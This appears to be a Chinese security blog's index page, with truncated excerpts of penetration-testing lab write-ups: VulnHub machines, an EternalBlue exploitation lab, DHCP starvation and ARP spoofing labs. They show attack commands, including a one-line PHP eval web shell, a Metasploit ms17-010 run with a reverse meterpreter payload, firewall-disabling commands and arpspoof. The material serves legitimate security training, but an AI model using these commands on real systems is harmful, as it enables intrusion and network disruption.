『vulnhub系列』doubletrouble-1
『vulnhub系列』doubletrouble-1下载地址1https://www.vulnhub.com/entry/doubletrouble-1,743/
信息搜集使用命令,获得存活靶机IP为138,开启端口22和80
1nmap 192.168.0.* #因为当前NAT模式,攻击机和靶机在一个内网环境中
访问80的web服务,是一个登录页面
又是qdPm,之前做过一个qdpm的题目,于是我们就知道了qdpm存在密码泄露漏洞。我们来看一下
1searchsploit qdpm
我们发现密码泄露漏洞是50176.txt,查看,发现我们可以去http://<website>/core/config/databases.yml 这个目录下,获得数据库的用户名密码
12searchsploit -m 50176.txt #将50176.txt存到当前目录cat 50176.txt
访问后,得到用户名:密码— otis :rush
但我们发现,靶机的3306端口并没有开,继续信息搜集
使用dirsearch爆破目录,得到如下目录,发现secret目录
1di ...
『vulnhub系列』Dripping-Blues-1
『vulnhub系列』Dripping-Blues-1下载地址:1https://www.vulnhub.com/entry/dripping-blues-1,744/
信息搜集:使用nmap进行本地扫描,确定Ip地址为137
1nmap 192.168.0.*
访问80端口web服务,有一串文字,意思大概是被攻击了,然后开了个小玩笑
这个名字可能会有用travisscott & thugger
使用dirsearch扫描目录,只发现robots.txt
1dirsearch -u "http://192.168.0.137/"
访问robots.txt 发现有一个/dripisreal.txt 和/etc/dripispowerful.html ,我们试着访问一下
发现是让我们访问一个歌词网站,并计算其中的“n words”的MD5值,这个值是ssh登录的密码
自己试了一下,我们使用py生成md5值,发现并不行,应该是猜错了,我们继续从别的地方入手
167aff0e8f24f431a9f31899e0c18839b
漏洞利用:因为开 ...
『vulnhub系列』ICA1
『vulnhub系列』ICA1下载地址1https://download.vulnhub.com/ica/ica1.zip
信息搜集如果靶机获取不了IP地址请看这里:『vulnhub系列』JANGOW | Don_Joshua’s Blog (jo4hua.github.io)
使用命令nmap 192.168.0.130 找到存活主机
开启了ssh,http,mysql服务,先访问80端口,进入如下登录界面
使用dirsearch扫描目录
1dirsearch -u "http://192.168.0.136/"
发现数据库配置界面
使用searchsploit qdPM 9.2 发现如下漏洞
一个是csrf现在我们还没到那一步,第二个是密码泄露,我们使用
searchsploit -m 50176.txt 将50176移到当前目录下,使用cat 50176.txt查看
漏洞利用发现访问http://<website>/core/config/databases.yml 网站的这个链接,即可以看到数据库的用户名和密码 ,成功(qdpma ...
『vulnhub系列』EMPIRE-BREAKOUT
『vulnhub系列』EMPIRE-BREAKOUT下载地址1https://www.vulnhub.com/entry/empire-breakout,751/
信息搜集使用nmap扫描内网存活主机
1nmap 192.168.0.*
访问80端口发现apache默认页面
在网页源代码中找到提示
123456<!--don't worry no one will get here, it's safe to share with you my access. Its encrypted :)++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>++++++++++++++++.++++.>>+++++++++++++++++.----.<++++++++++.-----------.>-----------.++++.<<+.>-.--------.++++++++++++++++++++.<---------- ...
『vulnhub系列』JANGOW
『vulnhub系列』JANGOW: 1.0.1下载地址1https://www.vulnhub.com/entry/jangow-101,754/
遇到问题发现不能获取ip地址
我们来到初始页面按e,将linux后面的ro改为rw single init=/bin/bash
然后Ctrl+x重启进入如下界面
ip a 查看网卡,发现是ens33
修改配置文件nano /etc/network/interfaces
将下列两个enp0s17修改为ens33
重启,使用nmap扫描,成功获取IP地址
信息搜集由刚才的扫描结果可知,这个机器开启了80端口,访问一下
使用dirsearch扫描目录
1dirsearch -u "http://192.168.0.133/"
发现了刚刚访问的site目录和.backup文件
访问一下.backup 发现数据库信息(数据库名,用户名,密码)
乱点发现代码执行
使用命令执行,写入一句话木马
1echo '<?php @eval($_POST['cmd']);?> ...
永恒之蓝实验
永恒之蓝实验我们通过永恒之蓝漏洞的利用来复现一下到提权和权限维持的windows渗透思路
信息搜集首先扫描局域网内存活主机
1nmap 192.168.0.*
之后使用nmap扫描132主机
1nmap 192.168.0.132
发现目标开启了445端口,可以利用永恒之蓝,进入msfconsole
1msfconsole
漏洞利用扫描msf17-010
1search ms17-010
我们使用第一个,然后查看配置
12use 0show options
设置目标IP和payload
123set rhost 192.168.0.132set payload windows/x64/meterpreter/reverse_tcprun
提权成功,进入shell并修改编码
123getuid #获取system权限shellchcp 65001
关闭防火墙
12**netsh advfirewall set currentprofile state offnetsh advfirewall set privateprofile state off**
开启 ...
DHCP饿死攻击及防御(基于ENSP模拟器、Kali攻击机实现)
DHCP饿死攻击及防御(基于ENSP模拟器、Kali攻击机实现)拓扑图
实验需求
通过配置DHCP_Server,使得192.168.0.0/24子网内的终端能够自动获取IP地址及DNS
通过配置SW交换机,开启DHCP Snooping功能,用于保证DHCP客户端从合法的DHCP服务器获取IP地址
Kali攻击机接入192.168.0.0/24内网中,获取内网IP地址,使用两种DHCP攻击方式并抓包进行分析(Wireshark)
实验步骤0.准备工具dhcpstarv,yesinia
123apt-get install dhcpstarvapt-get install yesinia图形界面打不开
1.配置dhcp服务器
1234567891011121314"""R3配置"""int g0/0/0ip address 192.168.0.254 24qip pool 1network 192.168.0.0gateway-list 192.168.0.254dhcp enableint g0/0/ ...
ARP欺骗
ARP欺骗环境搭建
准备一台kali虚拟机
一台win靶机
工具下载安装arpspoof工具
1arpspoof #会提示安装,输入y安装
断网攻击kali:使用nmap或fping判断存活主机
12nmap -sP 192.168.x.*fping -asg 192.168.x.0/24
在本地查看当前网关
1cat /etc/resolv.conf
此时win虚拟机ping百度是可以ping通的
windows:
开始攻击1arpspoof -i 网卡[eth0] -t [目标ip] [网关]
观察目标主机
windows:已经ping不通百度了
原理:攻击机假冒局域网网关,致使主机上不了网
可以通过在攻击前后在windows上使用命令arp -a查看网关的MAC地址的变化
攻击前的网关的MAC就是网关的MAC地址
而攻击后的网关的MAC地址,即为攻击机的MAC地址
当执行断网攻击的时候,攻击机会冒充网关给靶机发送arp报文
ARP欺骗(不断网)1234cat /proc/sys/net/ipv4/ip_forward #查看echo /proc/sys/net/i ...
密码生成工具cupp和cewl安装
我们可以使用Cupp生成一份结合具体目标的带社工性质的字典,比如结合目标的手机号,姓名,生日等
下面我们就来安装
Cupp的安装与使用使用命令:apt-get install cupp
查看命令 :cupp
redis安装
最近想着复现一下redis系列的漏洞,自己先搭建个环境
我们来安装4.08版本
redis-4.0.8的安装下载地址:http://download.redis.io/releases/redis-4.0.8.tar.gz
我们安装到我们的kali虚拟机上
使用命令wget http://download.redis.io/releases/redis-4.0.8.tar.gz
解压下载的redis-4.0.8.tar.gz文件,使用命令 tar xvf redis-4.0.8.tar.gz
进入解压文件夹redis-4.0.8,使用命令make编译可执行文件
之后在此文件夹中使用命令 redis-server redis.conf来启动服务,如下图,默认端口为6379
可以使用ps -ef|grep redis来查看redis服务是否开启
redis后台启动当然此时,redis服务是在前台运行,需要一直”挂着“才行,这里可以修改配置文件redis.conf,改为后端启动,将daemonize no
改为daemonize yes
再次使用redis-server redi ...